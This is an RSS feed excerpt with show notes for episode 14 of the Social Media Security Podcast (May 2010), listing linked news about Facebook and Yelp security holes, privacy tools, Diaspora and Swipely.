			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-2319" title="skull" src="http://socialmediasecurity.com/wp-content/uploads/2010/05/skull.jpg" alt="" width="104" height="102" />This is the 14th episode of the Social Media Security Podcast recorded May 14th, 2010.  This episode was hosted by <a href="http://twitter.com/agent0x0">Tom Eston</a> and <a href="http://twitter.com/streetsec">Scott Wright</a>.  Below are the     show notes, links to articles and news mentioned in the podcast:<strong> </strong></p>
<ul>
<li><a href="http://techcrunch.com/2010/05/11/yelp-security-hole-puts-facebook-user-data-at-risk-underscores-problems-with-instant-personalization/">Yelp Security Hole Puts Facebook User Data At  Risk, Underscores Problems With Instant Personalization</a> (two XSS holes  in a few days discovered)</li>
<li>Want to know what Cross-Site Scripting (XSS) is and how it works at a basic level? <a href="http://socialmediasecurity.com/2009/09/27/social-media-security-podcast-2-month-of-facebook-bugs-what-is-xss-canadian-privacy-ruling/">Check out Episode 2 of our podcast</a>.</li>
<li><a href="http://www.binint.com/2010/05/facebook-leaks-ip-addresses.html">Facebook  Leaks IP Addresses via Email</a></li>
<li><a href="http://www.baekdal.com/opinion/facebook-is-dying-social-is-not/">Facebook is dying,  social is not</a>.  <a href="http://calacanis.com/2010/05/12/the-big-game-zuckerberg-and-overplaying-your-hand/">Is Facebook overplaying your hand?</a></li>
<li><a href="http://www.joindiaspora.com/">Diaspora</a> <a href="http://www.nytimes.com/2010/05/12/nyregion/12about.html?src=mv">&#8220;The Open Source Anti-Facebook&#8221;</a> raised $133,182 (close to  <a href="http://www.kickstarter.com/projects/196017994/diaspora-the-personally-controlled-do-it-all-distr">4,000  supporters!</a>)</li>
<li>Dispite all this&#8230;Facebook Rolls out <a href="http://www.net-security.org/secworld.php?id=9293">New Security Features</a></li>
<li><a href="http://zesty.ca/facebook/">What  does Facebook publish about you and your friends</a>? <a href="http://willmoffat.github.com/FacebookSearch/">Searching the OpenGraph</a>.</li>
<li><a href="http://icanstalku.com/">I Can Stalk U</a> &#8211; Raising awareness about inadvertent  information sharing</li>
<li><a href="http://techcrunch.com/2010/05/11/swipely/">Swipely</a> aims to  take over where Blippy left off</li>
</ul>
<p>Please send any show feedback to <strong>feedback [aT]     socialmediasecurity.com</strong> or comment below.  You can also call     our voice mail box at <strong>1-613-693-0997</strong> if you have a     question for our Q&amp;A section on the next episode.  <strong>You can     also <a href="http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=329032812">subscribe     to the podcast in iTunes</a>. </strong>Thanks for listening!</p>
<div id="podPressPlayerSpace_1"><object id="audioplayer1" width="290" height="24" type="application/x-shockwave-flash" data="../wp-content/plugins/podpress/players/podango_player.swf"><param name="movie" value="http://socialmediasecurity.com/wp-content/plugins/podpress/players/podango_player.swf" /><param name="FlashVars" value="playerID=1&amp;bg=0xF8F8F8&amp;leftbg=0xEEEEEE&amp;text=0x666666&amp;lefticon=0x666666&amp;rightbg=0xCCCCCC&amp;rightbghover=0x999999&amp;righticon=0x666666&amp;righticonhover=0xFFFFFF&amp;slider=0x666666&amp;track=0xFFFFFF&amp;loader=0x9FFFB8&amp;border=0x666666&amp;listen_wrapper=off&amp;soundFile=http://socialmediasecurity.com/podpress_trac/play/2203/0/SocialMediaSecurityPodcast_13.mp3" /><param name="quality" value="high" /><param name="menu" value="false" /><param name="wmode" value="transparent" /></object></div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=IiB2xBQMIxg:5yyxSeMilA0:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/IiB2xBQMIxg" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://socialmediasecurity.com/2010/05/20/social-media-security-podcast-14-recent-facebook-hacks-and-controversy-diaspora-swipely/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<enclosure url="http://socialmediasecurity.com/podpress_trac/feed/2317/0/SocialMediaSecurityPodcast_14.mp3" length="20717703" type="audio/mpeg" />
<itunes:duration>43:04</itunes:duration>
		<itunes:subtitle>This is the 14th episode of the Social Media Security Podcast recorded May 14th, 2010.nbsp; This episode was hosted by Tom Eston and Scott Wright.nbsp; ...</itunes:subtitle>
		<itunes:summary>This is the 14th episode of the Social Media Security Podcast recorded May 14th, 2010.nbsp; This episode was hosted by Tom Eston and Scott Wright.nbsp; Below are the     show notes, links to articles and news mentioned in the podcast: 

	Yelp Security Hole Puts Facebook User Data At  Risk, Underscores Problems With Instant Personalization (two XSS holes  in a few days discovered)
	Want to know what Cross-Site Scripting (XSS) is and how it works at a basic level? Check out Episode 2 of our podcast.
	Facebook  Leaks IP Addresses via Email
	Facebook is dying,  social is not.nbsp; Is Facebook overplaying your hand?
	Diaspora "The Open Source Anti-Facebook" raised $133,182 (close to  4,000  supporters!)
	Dispite all this...Facebook Rolls out New Security Features
	What  does Facebook publish about you and your friends? Searching the OpenGraph.
	I Can Stalk U - Raising awareness about inadvertent  information sharing
	Swipely aims to  take over where Blippy left off

Please send any show feedback to feedback [aT]     socialmediasecurity.com or comment below.nbsp; You can also call     our voice mail box at 1-613-693-0997 if you have a     question for our Q#38;A section on the next episode.nbsp; You can     also subscribe     to the podcast in iTunes. Thanks for listening!
</itunes:summary>
		<itunes:keywords>security,socialmedia,privacy,facebook,myspace,twitter,socialnetworking,internet</itunes:keywords>
		<itunes:author>Social Media Security</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>No</itunes:block>
	<media:content url="http://socialmediasecurity.com/podpress_trac/feed/2317/0/SocialMediaSecurityPodcast_14.mp3" fileSize="20717703" type="audio/mpeg" /><feedburner:origLink>http://socialmediasecurity.com/2010/05/20/social-media-security-podcast-14-recent-facebook-hacks-and-controversy-diaspora-swipely/</feedburner:origLink></item>
	<media:credit role="author">Social Media Security</media:credit><media:rating>nonadult</media:rating><media:description type="plain">Social Media Security Podcast</media:description></channel>
</rss>
